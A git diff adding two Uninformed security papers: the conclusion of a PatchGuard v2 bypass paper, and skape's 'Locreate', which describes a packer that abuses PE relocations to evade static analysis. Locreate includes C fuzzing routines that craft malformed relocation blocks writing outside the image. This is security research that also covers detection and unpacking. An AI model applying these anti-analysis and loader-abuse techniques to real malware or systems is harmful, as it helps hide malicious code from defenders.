+function, it may be difficult to prevent an approach that utilizes debug
+registers to modify execution context at arbitrary locations within the
+kernel (at least, not without making the hypervisor completely responsible
+for managing all activities relating to the processor's complement of debug
+registers).
+
+7) Conclusion
+
+Although PatchGuard version 2 introduces significant improvements in some
+areas, it still remains vulnerable to a wide variety of potential attacks.
+Additionally, it is possible (though involved) to subvert PatchGuard
+entirely, with the purpose of running arbitrary custom code in a
+difficult-to-detect manner in the place of PatchGuard.
+
+With these points in mind, it is perhaps time to re-evaluate whether
+PatchGuard, in its current incarnation, is really worth all the trouble that
+Microsoft has put into it. Forcing the IHV and ISV world to clean house with
+their kernel mode code is certainly a reasonable goal (and one which
+ultimately benefits all Windows customers, no matter how certain companies
+with poorly written kernel mode code [8] may care to spin the facts), as
+badly written kernel mode code results in the chronic instability that
+Windows is often associated with at best, and privilege escalation and
+arbitrary code execution exploits in the worst case. However, there are still
+significant counterpoints to what PatchGuard represents: the fact that it may
+provide a convenient way for malicious kernel mode code to hide in a very
+difficult-to-detect manner, and the fact that there is real innovation that
+is stifled by the restrictions that PatchGuard places on the system. As an
+example of the latter, consider that Microsoft's very own Virtual Server 2005
+R2 SP1 (Beta) runs afoul of PatchGuard and requires a special kernel hotfix
+to alter what, exactly, PatchGuard protects in order to run without
+bugchecking the system with the infamous CRITICAL_STRUCTURE_CORRUPTION
+bugcheck made famous by PatchGuard [3]. This alone should be taken as an
+indicator that there *are* in fact legitimate uses for some of the techniques
+that PatchGuard prevents, despite Microsoft's insistence to the contrary. It
+should also be noted that despite Microsoft's statements that no exceptions
+would be made for PatchGuard [1], they have had to make adjustments at least
+once for their own code to run with PatchGuard. The conspiracy theorists
+among you might wonder whether Microsoft would be so gracious as to make such
+exemptions for legitimate uses of techniques blocked by PatchGuard for third
+party software with needs similar to those of Virtual Server 2005 R2 SP1,
+given their pointed statements to the contrary.
+
+As a final note relating to the objectives of PatchGuard, even with
+hypervisor technology deployed (and furthermore, even with so-called
+immutable memory as implemented by a hypervisor), there is little that can be
+done to protect drivers from each other, as even in a hypervisor-based system
+(where the kernel itself is protected from drivers), interdependent drivers
+will still be able to interfere with each other so long as they co-exist in
+the same domain.
+This is particularly problematic in Windows, given the concepts of device
+stacks and device interfaces that allow drivers to directly interact with
+each other in a variety of ways. It will be difficult to ensure that drivers
+do not resort to patching each other (or modifying pool allocations instead
+of patching code, in the case where immutable memory on code regions is being
+enforced by a hypervisor). Depending on what the objectives of a third party
+ISV attempting to bypass PatchGuard are, it may be possible to simply patch
+drivers (such as Ntfs.sys or Tcpip.sys) in lieu of patching the kernel. From
+this perspective, it is unlikely that Windows will ever become an environment
+where kernel mode drivers are completely isolated and unable to interfere
+with each other, despite the efforts of technologies such as PatchGuard.
+
+Microsoft has already started down a path that may eventually lead to a
+system where buggy drivers will be unable to crash the system (or patch each
+other), with the advent of the User Mode Driver Framework (UMDF). It remains
+to be seen, however, whether isolated user-mode drivers will become a viable
+alternative for high performance devices (such as PCI/PCI Express devices, as
+opposed to USB devices), instead of simply being confined to a small subset
+of the devices that ship with a typical computer. The author expects that
+wherever possible, Microsoft will attempt to move third party code outside of
+sensitive areas (like the kernel) and into more contained locations (such as
+a user-mode process). This is in line with the purported goals of PatchGuard:
+increasing system stability by preventing third party drivers from performing
+questionable actions (or at least, questionable actions in such a way that
+might bring down the system).
+
+Bibliography
+
+[1] Microsoft Corporation. Patching Policy for x64-Based Systems.
+    http://www.microsoft.com/whdc/driver/kernel/64bitpatching.mspx;
+    accessed December 10, 2006.
+
+[2] skape, Skywing. Bypassing PatchGuard on Windows x64.
+    http://uninformed.org/index.cgi?v=3&a=3&t=sumry;
+    accessed December 10, 2006.
+
+[3] Microsoft Corporation. Connect: Virtual Server 2005 R2 SP1 Beta.
+    https://connect.microsoft.com/site/sitehome.aspx?SiteID=151;
+    accessed December 28, 2006.
+
+[4] Advanced Micro Devices, Inc. AMD 64-Bit Technology.
+    http://www.amd.com/us-en/assets/content_type/white_papers_and_tech_docs/x86-64_overview.pdf;
+    accessed December 28, 2006.
+
+[5] Microsoft Corporation. RtlVirtualUnwind.
+    http://msdn2.microsoft.com/en-us/library/ms680617.aspx;
+    accessed December 28, 2006.
+
+[6] The PaX Team. Paging Based Non-Executable Pages.
+    http://pax.grsecurity.net/docs/pageexec.txt;
+    accessed December 30, 2006.
+
+[7] Sherri Sparks and Jamie Butler. "SHADOW WALKER" Raising the Bar for Rootkit Detection.
+    http://www.blackhat.com/presentations/bh-jp-05/bh-jp-05-sparks-butler.pdf;
+    accessed December 30, 2006.
+
+[8] Skywing. Anti-Virus Software Gone Wrong.
+    http://www.uninformed.org/?v=4&a=4&t=sumry;
+    accessed December 31, 2006.
diff --git a/uninformed/6.2.txt b/uninformed/6.2.txt
new file mode 100644
index 0000000..fad0b0a
--- /dev/null
+++ b/uninformed/6.2.txt
@@ -0,0 +1,895 @@
+Locreate: An Anagram for Relocate
+skape
+12/2006
+mmiller@hick.org
+
+1) Foreword
+
+Abstract: This paper presents a proof of concept executable packer
+that does not use any custom code to unpack binaries at execution time.
+This is different from typical packers, which generally rely on packed
+executables containing code that is used to perform the inverse of the
+packing operation at runtime. Instead of depending on custom code, the
+technique described in this paper uses documented behavior of the dynamic
+loader as a mechanism for performing the unpacking operation. This difference
+can make binaries packed using this technique more difficult to signature and
+analyze, but only when presented to an untrained eye. The description of this
+technique is meant as an example of a fun thought exercise, not as some sort
+of revolutionary packer. In fact, it's been used in the virus world many
+years prior to this paper.
+
+Thanks: The author would like to thank Skywing, spoonm, deft,
+intropy, Orlando Padilla, nemo, Richard Johnson, Rolf Rolles, Derek Soeder,
+and Andre Protas for their discussions and feedback.
+
+Challenge: Prior to reading this paper, the author recommends that
+the reader attempt to determine the behavior of the packer that was used on
+the binary included in the attached code sample. The binary itself is
+innocuous and just performs a few simple printf operations.
+
+Previous Research: This technique has been used in the virus world far in
+advance of this writing. Examples that apply this technique include
+W95/Resurrel and W95/Silcer. Further research indicates that Peter Szor did a
+write-up on this technique entitled ``Tricky Relocations'' in the April 2001
+edition of Virus Bulletin [2,3].
+
+2) Locreate
+
+Executable packers, such as UPX, are commonly employed by malware as a means
+of delaying or otherwise thwarting the process of static analysis. Packers
+also have perfectly legitimate uses, but these uses fall outside of the scope
+of this paper. The reason packers make static analysis more difficult is that
+they alter the form of the binary to the point that what appears on disk is
+entirely different from what actually ends up executing in memory. This
+alteration is typically accomplished by encapsulating a pre-existing binary
+in a ``host'' binary. The algorithm used to encapsulate the pre-existing
+binary in the host binary is what differs from one packer to the next. In
+most cases, the host binary must contain code that will perform the inverse
+of the packing operation in order to decapsulate the original binary. The
+code that is responsible for performing this operation is typically referred
+to as an unpacker. The process of unpacking the original binary is usually
+done entirely in memory without writing the original version out to disk.
+Once the original binary is unpacked, execution control is transferred to the
+original binary, which begins executing as if nothing had changed.
+
+This general approach represents an easy way of altering the form of a binary
+without changing its effective behavior. In fact, it's pretty much analogous
+to payload encoders that are used in conjunction with exploits to alter the
+form of a payload in order to satisfy some character restrictions without
+changing the payload's effective behavior. In the case of payload encoders,
+some arbitrary code must be prefixed to the encoded payload in order to
+perform the inverse of the encoding operation once the payload is executed.
+However, like payload encoders, the use of custom code to perform the inverse
+of the packing or encoding operation can lead to a few problems.
+ +The most apparent of these problems has to do with the fact that while the +packed form of an executable may be entirely different from its original, the +code used to perform the unpacking operation may be static. In the event that +the unpacker consists of static code, either in whole or in part, it may be +possible to signature or otherwise identify that a particular packing +algorithm has been used to produce a binary and thus make it easier to restore +the original form of the binary. This ability is especially important when it +comes to attempting to heuristically identify malware prior to allowing a user +to execute it. + +The use of custom code can also make it possible for tools to be developed +that attempt to identify unpackers based on their behavior. Ero Carrera has +provided some excellent illustrations relating to the feasibility of this type +of attack against unpackers[1]. An understanding of an unpacker's behavior may +also make it possible to acquire the original binary without allowing it to +actually execute by simply tracing the unpacker up until the point where it +transfers execution control to the original binary. In the case of malware, +this weakness means that benefits gained from packing an executable can be +completely nullified. + +Both of these problems are meant to illustrate that even though custom unpacking +code is often a requirement, its mere presence exposes a potential point of +weakness. If it were possible to eliminate the custom code required to unpack +a binary, it could make the two problems described previously much more difficult +to realize. To that point, the technique described in this paper does not +rely on the presence of custom code in a packed binary in order to unpack +itself. Instead, documented behavior of the dynamic loader is used to perform +the unpacking whenever the packed binary is executed. While this approach has +its benefits, there are a number of problems with it that will be discussed +later on. In the interest of brevity, the packer described in this paper will +simply be referred to as locreate. As was already mentioned, +locreate leverages a documented feature of most dynamic loaders in order to +perform its unpacking operation. Given that the process of unpacking +typically involves transforming the original binary's contents back into its +original form, there are only a finite number of dynamic loader features that +might be abused. Perhaps the feature that is best suited for transforming the +contents of a binary at runtime is the dynamic loader feature that was +designed to do just that: relocations. + +In the event that a binary is unable to be loaded at its preferred base +address at runtime, the dynamic loader is responsible for attempting to move +the binary to another location in memory. The act of moving a binary from its +preferred base address to a new base address is more commonly referred to as +relocating. When a binary is relocated to a new base address, any references +the binary might have to addresses that are relative to its preferred base +address will no longer be valid. As such, references that are relative to the +preferred base address must be updated by the dynamic loader in order to make +them relative to the new base address. Of course, this presupposes that the +dynamic loader has some knowledge of where in the binary these address +references are made. 
To satisfy this presupposition, binaries will typically +include relocation information to provide the dynamic loader with a map to the +locations within the binary that need to be adjusted. When a binary does not +include relocation information, it's classified as a non-relocatable binary. +Without relocation information, a binary cannot be relocated to an alternate +base address in an elegant manner (ignoring position independent executables). + +The structures used to convey relocation information differs from one binary +format to the next. For the purpose of this paper, only the structures used +to describe relocations of Portable Executable (PE) binaries will be +discussed. However, it should be noted that the approaches described in this +paper should be equally applicable to other binary formats, such as ELF. In +fact, other binary formats make the technique used by locreate even easier. +For example, ELF supports applying relocation fixups with an addend. This +addend is basically an arbitrary value that is used in conjunction with a +transformation. The PE binary format conveys relocation information through +one of the data directories that is included within the optional header +portion of the NT header. This data directory is symbolically referred to +through the use of the IMAGE_DIRECTORY_ENTRY_BASERELOC. The base relocation +data directory consists of zero or more IMAGE_BASE_RELOCATION structures which +are defined as: + +typedef struct _IMAGE_BASE_RELOCATION { + ULONG VirtualAddress; + ULONG SizeOfBlock; +// USHORT TypeOffset[1]; +} IMAGE_BASE_RELOCATION, *PIMAGE_BASE_RELOCATION; + +The base relocation data directory is a little bit different from most other +data directories. The IMAGE_BASE_RELOCATION structures embedded in the data +directory do not occur immediately one after the other. Instead, there are a +variable number of USHORT sized fixup descriptors that separate each +structure. The SizeOfBlock attribute of each structure describes the entire +size of a relocation block. Each relocation block consists of the base +relocation structure and the variable number of fixup descriptors. Therefore, +enumeration of the base relocation data directory is best performed by using +the SizeOfBlock attribute of each structure to proceed to the next relocation +block until none are remaining. The VirtualAddress attribute of each +relocation block is a page-aligned relative virtual address (RVA) that is used +as the base address when processing its associated fixup descriptors. In this +manner, each relocation block describes the relocations that should be applied +to exactly one page. + +The fixup descriptors contained within a relocation block describe the address +of the value that should be transformed and the method that should be used to +transform it. The PE format describes about 10 different transformations that +can be used to fixup an address reference. These transformations are conveyed +through the top 4 bits of each fixup descriptor. The bottom 12 bits are used +to describe the offset into the VirtualAddress of the containing relocation +block. Adding the bottom 12 bits of a fixup descriptor to the VirtualAddress +of a relocation block produces the RVA that contains a value that needs to be +transformed. Of the transformation methods that exist, the one most commonly +used on x86 is IMAGE_REL_BASED_HIGHLOW, or 3. 
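+
+To make the mechanics described above concrete, the following is a minimal
+sketch of how the base relocation data directory can be walked and HIGHLOW
+fixups applied, assuming the image has already been mapped. This is meant as
+an illustration of the documented format rather than the dynamic loader's
+actual implementation, and bounds checking is omitted for brevity:
+
+#include <windows.h>
+
+VOID ApplyHighLowFixups(PUCHAR ImageBase, LONG Displacement)
+{
+    PIMAGE_NT_HEADERS NtHeaders =
+        (PIMAGE_NT_HEADERS)(ImageBase + ((PIMAGE_DOS_HEADER)ImageBase)->e_lfanew);
+    PIMAGE_DATA_DIRECTORY Dir =
+        &NtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
+    PIMAGE_BASE_RELOCATION Block =
+        (PIMAGE_BASE_RELOCATION)(ImageBase + Dir->VirtualAddress);
+    ULONG Remaining = Dir->Size;
+
+    //
+    // Each relocation block covers one page.  SizeOfBlock includes both the
+    // block header and the variable number of USHORT fixup descriptors.
+    //
+    while (Remaining >= sizeof(IMAGE_BASE_RELOCATION) && Block->SizeOfBlock)
+    {
+        ULONG   Count  = (Block->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) /
+                         sizeof(USHORT);
+        PUSHORT Fixups = (PUSHORT)(Block + 1);
+        ULONG   Index;
+
+        for (Index = 0; Index < Count; Index++)
+        {
+            //
+            // The top 4 bits select the fixup type and the bottom 12 bits
+            // give the offset into the page described by VirtualAddress.
+            //
+            if ((Fixups[Index] >> 12) == IMAGE_REL_BASED_HIGHLOW)
+                *(PULONG)(ImageBase + Block->VirtualAddress +
+                          (Fixups[Index] & 0xfff)) += Displacement;
+        }
+
+        Remaining -= Block->SizeOfBlock;
+        Block = (PIMAGE_BASE_RELOCATION)((PUCHAR)Block + Block->SizeOfBlock);
+    }
+}
+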
+The HIGHLOW transformation dictates that the 32-bit displacement between the
+original base address and the new base address should be added to the value
+that exists at the RVA described by the fixup descriptor. The act of adding
+the displacement means that the value will be transformed to make it relative
+to the new base address rather than the original base address. To better
+understand how all of these things tie together, consider the following
+source code example:
+
+#include <stdlib.h>
+#include <stdio.h>
+
+int main(int argc, char **argv)
+{
+    printf("Hello World.\n");
+
+    return 0;
+}
+
+When compiled down, this function appears as the following:
+
+sample!main:
+00401010 55              push    ebp
+00401011 8bec            mov     ebp,esp
+00401013 6800104200      push    offset sample!__rtc_tzz (sample+0x21000) (00421000)
+00401018 e80c000000      call    sample!printf (00401029)
+0040101d 83c404          add     esp,4
+00401020 33c0            xor     eax,eax
+00401022 5d              pop     ebp
+00401023 c3              ret
+
+At address 0x00401013, main pushes the address of the string that contains
+``Hello World.'':
+
+0:000> db 00421000 L 10
+00421000  48 65 6c 6c 6f 20 57 6f-72 6c 64 2e 0a 00 00 00  Hello World.....
+
+In this case, the push instruction is referring to the string using an
+absolute address. If the sample executable must be relocated at runtime, the
+dynamic loader must be provided with the relocation information necessary to
+fixup the reference to the absolute address. The dumpbin.exe utility from
+Visual Studio can be used to confirm that this information exists. The first
+requirement is that the binary must have relocation information. By default,
+all DLLs will contain relocation information, but executables typically do
+not. Executables can be compiled with relocation information by using the
+/fixed:no linker flag. When a binary is compiled with relocations, the
+presence of relocation information is simply indicated by a non-zero
+VirtualAddress and Size for the base relocation data directory. These values
+can be determined through dumpbin.exe /headers:
+
+   26000 [     EE8] RVA [size] of Base Relocation Directory
+
+Since relocation information must be present at runtime, there should also be
+a section, typically named .reloc, that contains the virtual mapping
+information for the relocation information:
+
+SECTION HEADER #5
+  .reloc name
+    1165 virtual size
+   26000 virtual address (00426000 to 00427164)
+    2000 size of raw data
+   24000 file pointer to raw data (00024000 to 00025FFF)
+       0 file pointer to relocation table
+       0 file pointer to line numbers
+       0 number of relocations
+       0 number of line numbers
+42000040 flags
+         Initialized Data
+         Discardable
+         Read Only
+
+In order to validate that this executable contains relocation information for
+the absolute address reference made to the ``Hello World.'' string, the
+dumpbin.exe /relocations command can be used:
+
+File Type: EXECUTABLE IMAGE
+
+BASE RELOCATIONS #5
+    1000 RVA,       A8 SizeOfBlock
+      14  HIGHLOW            00421000
+      2C  HIGHLOW            00420350
+...
+
+This output shows the first relocation block, which describes the RVA 0x1000.
+Each line below the relocation block header describes the individual fixup
+descriptors. The information displayed includes the offset into the page, the
+type of transformation being performed, and the current value at that location
+in the binary. From the disassembly above, the location of the address
+reference that is being made is 0x00401014. 
Therefore, the very first fixup
+in this relocation block provides the dynamic loader with the information
+necessary to change the address reference to the new base address when the
+binary is relocated. If this binary were to be relocated to 0x50000000, the
+HIGHLOW transformation would be applied to 0x00401014 as follows. The
+displacement between the new base address and the old address would be
+calculated as 0x50000000 - 0x00400000, or 0x4fc00000. Adding 0x4fc00000 to
+the existing value of 0x00421000 produces 0x50021000, which is subsequently
+stored in 0x00401014. This causes the absolute address reference to become
+relative to the new base address.
+
+Based on this basic understanding of how relocations are processed, it's now
+possible to describe how a packer can be implemented that takes advantage of
+the way the dynamic loader processes relocation information. As has been
+illustrated above, relocation information is designed to make it possible to
+fixup absolute address references at runtime when a binary is relocated.
+These fixups are applied by taking into account the displacement between the
+new base address and the original base address. More often than not, this
+displacement isn't known ahead of time, thus making it impossible to reliably
+predict how the content at a specific location in the binary will be altered.
+But what if it were possible to deterministically know the displacement in
+advance? Knowing the displacement in advance would make it possible to alter
+various locations of the binary in a manner that would permit the original
+values to be restored by relocations at runtime. In effect, the on-disk
+version of the binary could be made to appear quite different from the
+in-memory version at runtime. This is the basic concept behind locreate.
+
+In order for locreate to work, it must be possible to predict the displacement
+reliably. Since the displacement is calculated in relation to the preferred
+base address and the expected base address, both values must be known.
+Furthermore, the binary must be relocated every time it executes in order for
+the relocations to be applied. As it happens, both of these problems can be
+solved at once. Since a binary is only guaranteed to be relocated if its
+preferred base address is in conflict with an existing address, a preferred
+base address must be selected that will always lead to a conflict. This can
+be accomplished by setting the preferred base address to any invalid user-mode
+address (any address at or above 0x80000000). This assumes that the machine
+that the executable will run on is not booted with /3GB. If it is, a higher
+address would have to be used. Alternatively, the base address can be set to
+SharedUserData, which is guaranteed to be located at 0x7ffe0000 in every
+process. Setting the binary's preferred base address to any of these
+addresses will force it to be relocated every time it executes. The only
+unknown is what address the binary is expected to be relocated to.
+
+Determining the address that the binary will be relocated to depends on the
+state of the process' address space at the time that the binary is relocated.
+If the binary that's being relocated is an executable, then the process'
+address space is generally in a pristine state since the executable is one of
+the first things to be mapped into the address space. As such, the first
+available address will always be 0x10000 on default installations of Windows. 
+If the binary is a DLL, it's hard to predict what the state of the address
+space will be in all cases. When a conflict does occur, the kernel searches
+for an available address region by traversing from lowest to highest address.
+For the purposes of this paper, it will be assumed that an executable is being
+packed and that the address being relocated to is 0x10000. Further research
+may provide insight into how to better control or alter the expected base
+address.
+
+With both the preferred base address and the expected base address known, the
+only thing that remains is to perform the operations that will transform the
+on-disk version of the binary in a manner that causes custom relocations to
+restore the binary to its original form at runtime. This process can be
+either simple or complicated. The simplest approach would be to enumerate
+the contents of each section in the binary, altering the value at each
+location by subtracting the displacement and then creating a relocation fixup
+descriptor that will ensure that the contents are restored to the expected
+value at runtime. This is how the proof of concept works. A more complicated
+approach would be to create multiple relocation fixup descriptors per address.
+This would mean that the displacement would need to be subtracted once for
+each fixup descriptor. It should also be possible to apply relocations to
+individual bytes within a four byte span rather than applying relocations in
+four byte increments. Even more interesting would be to use some fixup types
+other than HIGHLOW, although this could be seen as something that might make
+generating a signature easier.
+
+The end result of this whole process is a functional proof of concept that
+packs a binary in the manner described above. To get a feel for how different
+the binary looks after being packed, consider what the implementation of main
+from earlier in this paper looks like. Notice how the first two instructions
+are the same as they were previously. This has to do with the fact that base
+addresses must align on 64KB boundaries, and thus the lower two bytes of each
+relocated value are not changed. This could be further improved through
+strategies such as those described above:
+
+.text:84011000 loc_84011000:
+.text:84011000     push    ebp
+.text:84011001     mov     ebp, esp
+.text:84011003     in      al, dx
+.text:84011004     add     [eax+0], dh
+.text:84011006     add     [edi+edi*8+1209C15h], eax
+.text:8401100D     test    [ebx-3FCCFB3Ch], al
+.text:84011013     loope   near ptr 84010FD8h
+.text:84011015
+.text:84011015 loc_84011015:
+.text:84011015     push    (offset off_8401139C+1)
+
+The locreate proof of concept has been tested on Windows XP and Windows 2003
+Server. Initial testing on Windows Vista indicates that Vista does not
+properly alter the entry point address after relocations have been applied
+when an executable is packed. Even though the proof of concept implementation
+works, there are a number of more fundamental problems with the technique
+itself.
+
+The first set of problems has to do with techniques that can be used to
+signature locreate packed executables. Since locreate relies on injecting a
+large number of relocation fixups, it may be possible to heuristically detect
+an increased number of relocation fixups relative to the size of individual
+segments. This particular attack could be solved by decreasing the
+number of relocation fixups injected by locreate. 
This would have the effect +of only partially mangling the binary, but it might be enough to make people +wonder what's going on without giving things away. Even if it weren't +possible to heuristically detect an increased number of relocation fixups, +it's definitely possible to detect the fact that an executable packed by +locreate will have an invalid preferred base address that will always result +in a conflict. This fact alone makes it mostly trivial to at least detect +that something odd is going on. + +Detection is only the first problem, however. Once a locreate packed +executable has been detected, the next logical step is to attempt to figure +out some way of obtaining the original executable. Since locreate relies on +relocation fixups to do this, the only thing one would have to do in order to +obtain the original binary would be to relocate the executable to the expected +base address that was used when the binary was packed, such as 0x10000. While +it's trivial to develop tools to perform this action, the Interactive +Disassembler (IDA) already supports it. When opening an executable, the +``Manual Load'' checkbox can be toggled. This will cause IDA to prompt the +user to enter the base address that the binary should be loaded at. When the +base address is entered, IDA processes relocations and presents the relocated +binary image. The mitigating factor here is that the user must know the +expected base address, otherwise the binary will still appear completely +mangled when it's relocated to the wrong base address. + +In the author's opinion, these problems make locreate a sub-par packer. At +best it should be viewed as an interesting approach to the problem of packing +executables, but it should not be relied upon as a means of thwarting static +analysis. Anyone who reads this paper will have the tools necessary to unpack +executables that have been packed by locreate. With that said, it should be +noted that there is still an opportunity for further research that could help +to identify ways of improving locreate. For instance, a better understanding +of differences in the way the dynamic loader and existing static analysis +tools process relocation fixups could provide some opportunity for +improvement. Results from some of the author's initial tests of these ideas +are included in appendix A. Here's a brief list of some differences that could +exist: + + 1. Different behaviors when processing fixups + + It's possible that the dynamic loader and static analysis tools such as IDA + may not support the same set of fixup types. Furthermore, they may not + process fixup types in the same way. If differences do exist, it may be + possible to create a packed executable that will work correctly when used + against the dynamic loader but not render properly when relocated using a + static analysis tool such as IDA. + + 2. Relocation blocks with non-page-aligned VirtualAddress fields + + It's unknown whether or not the dynamic loader and static analysis tools are + able to properly handle relocation blocks that have non-page-aligned + VirtualAddress's. In all normal circumstances, VirtualAddress will be + page aligned. + + 3. Relocation blocks that modify other relocation blocks + + An interesting situation that may lead to differences between the dynamic + loader and static analysis tools has to do with relocation blocks that modify + other relocation blocks. 
In this way, the relocation information that exists
+   on disk is not what is actually used, in its entirety, when relocating an
+   image during runtime.
+
+Even if research into these topics doesn't yield any direct improvements to
+locreate, it should nonetheless provide some interesting insight into the way
+that different applications handle relocation processing. And after all,
+gaining knowledge is what it's really all about.
+
+Appendix A) Differences in Relocation Processing
+
+This appendix attempts to describe some tests that were run on different
+applications that process relocation entries for binary files. Identifying
+differences may make it possible to have a binary that will work correctly
+when executed but not when analyzed by a static analysis tool such as IDA. To
+test out these ideas, the author threw together a small relocation fuzzing
+tool that is aptly named relocfuzz. This tool will take a pre-existing binary
+and create a new one with custom relocations. The code for this tool can be
+found in the other code associated with this paper.
+
+The tests included in this appendix were performed against three different
+applications: the dynamic loader (ntdll.dll), IDA, and dumpbin. If the same
+tests are run against other applications, the author would be interested in
+knowing the results.
+
+A.1) Non-page-aligned Block VirtualAddress
+
+In all normal cases, relocation blocks will be created with a page-aligned
+VirtualAddress. However, it's unclear if non-page-aligned VirtualAddress
+fields will be handled correctly when relocations are processed. There are
+some interesting implications of non-page-aligned VirtualAddress fields. In
+many applications, such as the dynamic loader, it's critical that addresses
+referenced through RVAs are validated so as to prevent references being made
+to external addresses. For example, if relocations were processed in
+kernel-mode, it would be critical that checks be performed to ensure that RVAs
+don't end up making it possible to reference kernel-mode addresses. The
+reason why non-page-aligned VirtualAddress fields are interesting is that
+they leave open the possibility of this type of attack.
+
+Consider the scenario of a binary that is relocated to 0x7ffe0000, ignoring
+for the moment that SharedUserData already exists at this location. Now,
+consider that this binary has a relocation block with a virtual address of
+0x1ffff. This address is not page-aligned. Now, consider that this
+relocation block has a fixup descriptor that indicates that at offset 0x4 into
+this page, a certain type of fixup should be performed. This would equate to
+modifying memory at 0x80000003, a kernel-mode address. If relocations were
+being processed in kernel-mode, as they are on Windows Vista for ASLR, then a
+failure to check the actual address being written to would result in a
+dangerous condition.
+
+Here's an example of some code that attempts to test out this idea:
+
+static VOID TestNonPageAlignedBlocks(
+    __in PPE_IMAGE Image,
+    __in PRELOC_FUZZ_CONTEXT FuzzContext)
+{
+    PRELOCATION_BLOCK_CONTEXT KillerBlock = AllocateRelocationBlockContext(1);
+
+    PrependRelocationBlockContext(
+        FuzzContext,
+        KillerBlock);
+
+    KillerBlock->Rva       = 0x10001;
+    KillerBlock->Fixups[0] = (3 << 12) | 0;
+}
+
+In this example, a custom relocation block is created with one fixup
+descriptor. The VirtualAddress associated with the block is set to 0x10001
+and the first fixup descriptor is set to modify offset 0 into that RVA. 
If
+the binary that is hosting these relocations is relocated to 0x10000, a write
+should occur to 0x20001 when processing the relocations. Here are the results
+from a few initial tests:
+
+ntdll.dll: The relocation fixup is processed and results in a write
+to 0x20001.
+
+IDA: Ignores the relocation fixup, but it would appear that this is only
+because the fixup writes outside of the executable.
+
+dumpbin.exe: Parses the relocation block without issue.
+
+A.2) Writing to External Addresses
+
+Due to the fact that the VirtualAddress associated with each relocation block
+is a 32-bit RVA, it is possible to create relocation blocks that have RVAs
+that actually reside outside of the mapped executable that is being relocated.
+This is important because if steps aren't taken to detect this scenario, the
+application processing the relocation fixups might be tricked into writing to
+memory that is external to the mapped binary. Creating a test case for this
+scenario is trivial:
+
+static VOID CreateExternalWriteRelocationBlock(
+    __in PPE_IMAGE Image,
+    __in PRELOC_FUZZ_CONTEXT FuzzContext)
+{
+    PRELOCATION_BLOCK_CONTEXT ExtBlock = AllocateRelocationBlockContext(2);
+
+    ExtBlock->Rva       = 0x10000;
+    ExtBlock->Fixups[0] = (3 << 12) | 0x0;
+    ExtBlock->Fixups[1] = (3 << 12) | 0x1;
+
+    PrependRelocationBlockContext(
+        FuzzContext,
+        ExtBlock);
+}
+
+In this test, a relocation block is created that has a VirtualAddress of
+0x10000. When the binary is relocated to 0x10000, the actual address of the
+region that will be written to is 0x20000. In almost all versions of Windows
+NT, this address is the location of the process parameters structure. The
+block itself contains two fixup descriptors, each of which will result in a
+write to the first few bytes of the process parameters structure. The results
+after running this test are:
+
+ntdll.dll: The relocation fixup is processed and results in two 32-bit writes
+to 0x20000 and 0x20001.
+
+IDA: Ignores RVAs outside of the executable.
+
+dumpbin.exe: N/A, dumpbin doesn't actually perform relocation fixups.
+
+A.3) Self-updating Relocation Blocks
+
+One of the more interesting nuances about the way relocation fixups are
+processed is that it's actually possible to create a relocation block that
+will perform fixups against other relocation blocks. This has the effect of
+making it such that the relocation information that appears on disk is
+actually different from what is processed when relocation fixups are applied.
+The basic idea behind this approach is to prepend certain relocation blocks
+that apply fixups to subsequent relocation blocks. This all works because
+relocation blocks are typically processed in the order that they appear. 
An +example of this basic concept is described shown below: + +static VOID PrependSelfUpdatingRelocations( + __in PPE_IMAGE Image, + __in PRELOC_FUZZ_CONTEXT FuzzContext) +{ + PRELOCATION_BLOCK_CONTEXT SelfBlock; + PRELOCATION_BLOCK_CONTEXT RealBlock; + ULONG RelocBaseRva; + ULONG NumberOfBlocks = FuzzContext->NumberOfBlocks; + ULONG Count; + + // + // Grab the base address that relocations will be loaded at + // + RelocBaseRva = FuzzContext->BaseRelocationSection->VirtualAddress; + + // + // Grab the first block before we start prepending + // + RealBlock = FuzzContext->NewRelocationBlocks; + + // + // Prepend self-updating relocation blocks for each block that exists + // + for (Count = 0; Count < NumberOfBlocks; Count++) + { + PRELOCATION_BLOCK_CONTEXT RelocationBlock; + + RelocationBlock = AllocateRelocationBlockContext(2); + + PrependRelocationBlockContext( + FuzzContext, + RelocationBlock); + } + + // + // Walk through each self updating block, fixing up the real blocks to + // account for the amount of displacement that will be added to their Rva + // attributes. + // + for (SelfBlock = FuzzContext->NewRelocationBlocks, Count = 0; + Count < NumberOfBlocks; + Count++, SelfBlock = SelfBlock->Next, RealBlock = RealBlock->Next) + { + SelfBlock->Rva = RelocBaseRva + RealBlock->RelocOffset; + + // + // We'll relocate the two least significant bytes of the real block's RVA + // and SizeOfBlock. + // + SelfBlock->Fixups[0] = (USHORT)((IMAGE_REL_BASED_HIGHLOW << 12) | + (((RealBlock->RelocOffset - 2) & 0xfff))); + SelfBlock->Fixups[1] = (USHORT)((IMAGE_REL_BASED_HIGHLOW << 12) | + (((RealBlock->RelocOffset + 2) & 0xfff))); + SelfBlock->Rva &= ~(PAGE_SIZE-1); + + // + // Account for the amount that will be added by the dynamic loader after + // the first self-updating relocation blocks are processed. + // + *(PUSHORT)(&RealBlock->Rva) -= (USHORT)(FuzzContext->Displacement >> 16) + 2; + *(PUSHORT)(&RealBlock->SizeOfBlock) -= (USHORT)(FuzzContext->Displacement >> 16) + 2; + } +} + +This test works by prepending a self-updating relocation block for each +relocation block that exists in the binary. In this way, if there were two +relocations blocks that already existed, two self-updating relocation blocks +would be prepended, one for each of the two existing relocation blocks. +Following that, the self-updating relocation blocks are populated. Each +self-updating relocation block is created with two fixup descriptors. These +fixup descriptors are used to apply fixups to the VirtualAddress and +SizeOfBlock attributes of its corresponding existing relocation block. Since +a HIGHLOW fixup only applies to two most significant bytes, the RVAs of the +corresponding fields are adjusted down by two. The end result of this +operation is that the first n relocation blocks are responsible for fixing up +the VirtualAddress and SizeOfBlock attributes associated with subsequent +relocation blocks. When relocations are processed in a linear fashion, the +subsequent relocation blocks are updated in a way that allows them to be +processed correctly. + +Running this test against the set of test applications produces the following +results: + +ntdll.dll: The relocation blocks are fixed up accordingly and the application +executes as expected. + +IDA: Initial testing indicates that IDA is capable of handling self-updating +relocation blocks. 
